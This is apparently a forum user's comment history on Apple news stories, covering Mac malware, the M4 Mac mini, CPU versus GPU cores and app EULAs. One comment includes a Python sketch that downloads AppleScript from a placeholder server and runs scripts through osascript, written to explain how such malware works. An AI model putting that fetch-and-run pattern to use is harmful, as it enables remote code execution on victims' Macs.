dope_ahmine

About
- Username: dope_ahmine
- Joined
- Visits: 52
- Last Active
- Roles: member
- Points: 725
- Badges: 0
- Posts: 270
Reactions
North Korean hackers use infected crypto apps to target Macs
@AppleInsider said:
One of the most concerning parts of the malware is its ability to execute remote AppleScript commands.

Do they really execute remotely? I think these commands are still executing locally.
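A minimal sketch of the distinction being made here, with a hypothetical payload URL: in this kind of attack the AppleScript text is typically delivered from a remote server, but it still runs locally on the Mac through osascript, with whatever privileges the infected app already has. The script run below is a harmless notification, not actual malware behavior.

```python
# Sketch only: "remote AppleScript execution" usually means remotely supplied,
# locally executed. The C2 URL below is hypothetical.
import subprocess
import urllib.request

C2_URL = "https://example.com/payload.applescript"  # hypothetical server

def fetch_script(url: str) -> str:
    # The AppleScript *text* arrives over the network...
    with urllib.request.urlopen(url) as resp:
        return resp.read().decode("utf-8")

def run_locally(script: str) -> str:
    # ...but it is executed on the local Mac by the osascript binary.
    result = subprocess.run(
        ["osascript", "-e", script],
        capture_output=True, text=True, check=False,
    )
    return result.stdout

if __name__ == "__main__":
    # Stand-in for fetch_script(C2_URL): a harmless, locally executed command.
    run_locally('display notification "remotely supplied, locally executed"')
```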
M4 Mac mini review roundup: Pint-sized powerhouse that won't break the bank
blastdoor said:
The TechCrunch quotes seem oddball to me.
I guess if you landed on Earth in a pod yesterday you might not have a monitor, keyboard, and mouse handy. But I'll bet a very large share of adults over the age of, say, 30 have a monitor, keyboard, and mouse already. That's not a small market.
Sidecar over Wi-Fi is already quite decent, but with a USB-C cable you get yourself a really nice monitor + keyboard + touch input. And there are plenty of iPad users out there who would love this setup.
Generation gaps: How much faster Apple Silicon gets with each release
netrox said:
Exactly why do we need to keep adding more CPU cores when most creative oriented applications would benefit from having more GPU cores?

chasm said:
More GPUs are needed when you have really really large screens/more screens. More CPUs are needed when you need more graphics.

programmer said:
The question of CPUs vs GPUs on the SoC is a complex one. Many applications don't use the GPU at all, except for the UI (which hardly needs any GPU at all) but are optimized for multiple CPUs... adding more GPU for those applications gets you nothing. Even GPU-heavy applications can also benefit from more CPUs, in some cases. Ultimately though, the GPUs tend to be memory bandwidth limited, so scaling up the GPU beyond what the memory bandwidth can support gets us very little.
On top of that, GPUs today are crucial for AI and creative tasks because of their ability to handle tons of calculations in parallel, which is exactly what’s needed for training neural networks and other data-heavy workloads. Modern GPUs even come with specialized hardware, like NVIDIA’s Tensor Cores, that’s purpose-built for the matrix math involved in deep learning. This kind of hardware boost is why GPUs are so valuable for things like image recognition or natural language processing—they’re not just for “manipulating pixels”.
CPUs and GPUs actually complement each other in AI. CPUs handle tasks with lots of decision-making or data management, while GPUs jump in to power through the raw computation. It’s not just about one or the other; the best results come from using both for what each does best.
As for energy efficiency, GPUs perform many tasks at a much lower power cost than CPUs, which is huge for AI developers who need high-speed processing without the power drain (or cost) that would come from only using CPUs.
And on top of all that, new architectures are even starting to blend CPU and GPU functions, like Apple's M-series chips, which let both CPU and GPU access the same memory to cut down on data transfer times and save power. Plus, with popular frameworks like PyTorch and TensorFlow (built on top of platforms like CUDA), it's easier than ever to write code that leverages GPUs, so more developers can get the speed and efficiency benefits without diving deep into complex GPU programming (see the sketch below).
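A minimal sketch of that last point, assuming PyTorch (1.12 or later) is installed: the same matrix math runs unchanged on an NVIDIA GPU via the CUDA backend or on an Apple Silicon GPU via the MPS backend (which uses the unified memory described above), with only the device selection differing.

```python
# Sketch only: device selection in PyTorch, assuming torch >= 1.12 is installed.
import torch

def pick_device() -> torch.device:
    # NVIDIA GPUs are exposed through the CUDA backend...
    if torch.cuda.is_available():
        return torch.device("cuda")
    # ...while Apple Silicon GPUs (M-series, unified memory) use the MPS backend.
    if torch.backends.mps.is_available():
        return torch.device("mps")
    return torch.device("cpu")

device = pick_device()

# The same matrix-multiply code runs on CPU or GPU; only the device changes.
a = torch.randn(2048, 2048, device=device)
b = torch.randn(2048, 2048, device=device)
c = a @ b  # dispatched to the GPU's parallel hardware when available
print(device, c.shape)
```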
Facebook ad partner may have tried to listen into your conversations
iOS could add an inspection function to every app's EULA. It would allow the user to use Apple Intelligence to "chat" with the EULA text before hitting the consent button. This would at least make it much more difficult for app makers to hide important info in there, whether in cryptic language or small print.
Is Apple finally serious about gaming after its latest push?